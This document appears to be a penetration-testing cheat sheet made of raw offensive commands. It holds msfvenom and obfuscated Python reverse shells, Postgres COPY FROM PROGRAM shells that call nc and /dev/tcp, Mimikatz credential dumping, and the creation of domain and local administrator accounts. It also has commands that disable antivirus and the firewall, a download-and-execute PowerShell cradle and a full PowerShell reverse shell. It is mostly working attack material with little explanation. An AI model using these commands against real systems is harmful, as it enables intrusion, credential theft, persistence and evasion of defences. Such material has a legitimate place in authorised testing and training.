Msfvenom

Python

msfvenom -p cmd/unix/reverse_python LHOST=10.10.15.149 LPORT=1234 R
 
 
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkN8LgjAQx/+V2NMEmc7sIWIPEgYRFaTvomuhZLvhzf8/lhs9ehzcr8/dF274GJjsBkG+ld38LMa5MxNIhegb4JNDD2gF4SlzvmM83xM/cVcEz7a5r1EsJ9kSqK+KU3O+lXUQWprV/XhpqvpRFtcorDMJWitpKXWannciUUAA2XM2GUX2GkalgfpBnK4SfJXIAmHE/xtMtuNISdINOula7En0BYiDVuU=')[0])))"

PowerShell

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.15.211 LPORT=80 R

SQL

Postgres 5432

proxychains psql -h 127.0.0.1 -p 5432 -U 'postgres'
postgres=# CREATE TABLE shell(output text);
postgres=# COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.149 2020 > /tmp/f';

# Getting bash shell

postgres=# CREATE TABLE bash_shell (output text);
CREATE TABLE
postgres=# COPY bash_shell FROM PROGRAM $$/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.45.225/4444 0>&1'$$;

SSH

id_rsa

ssh root@10.10.110.123 -i id_rsa

Mimikatz

Escalate Privileges

privilege::debug
token::elevate

Cached credential Storage and Retrieval

mimikatz # lsadump::sam
mimikatz # sekurlsa::logonpasswords

Active Directory

Enumeration

Windows

net view /domain

Add a domain user and put them in the Domain Admins group

net user username password /ADD /DOMAIN
net group "Domain Admins" ipsec /ADD /DOMAIN

File transfer

Certutil

Windows

certutil -urlcache -split -f http://192.168.49.135:80000/active-directory/GetUserSPNs.ps1

Windows

Adding user

net user /add ipsec TryHarder.1234
net localgroup administrators ipsec /add

Enumeration

groups

whoami /groups

system information

systeminfo

High mandatory level

powershell.exe Start-Process cmd.exe -Verb runAs

Disable AV

Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus

Disable Firewall

netsh advfirewall set allprofiles state off
netsh advfirewall set currentprofile state off

Impacket

SmbClient

impacket-smbclient 'corp.local/ned.flanders_adm:Lefthandedyeah!@172.16.1.36' -dc-ip 172.16.1.5

GetUserSPNs

impacket-GetUserSPNs 'corp.local/ned.flanders_adm:Lefthandedyeah!' -dc-ip 172.16.1.5

AMSI bypass

In-Memory Execution

powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.149:80/large.ps1')

Basic PowerShell

powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.16.108', 4443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

https://exploit-notes.hdks.org/exploit/web/apache-tomcat-pentesting/

https://github.com/0xJs/RedTeaming_CheatSheet/blob/main/infrastructure/privesc_windows.md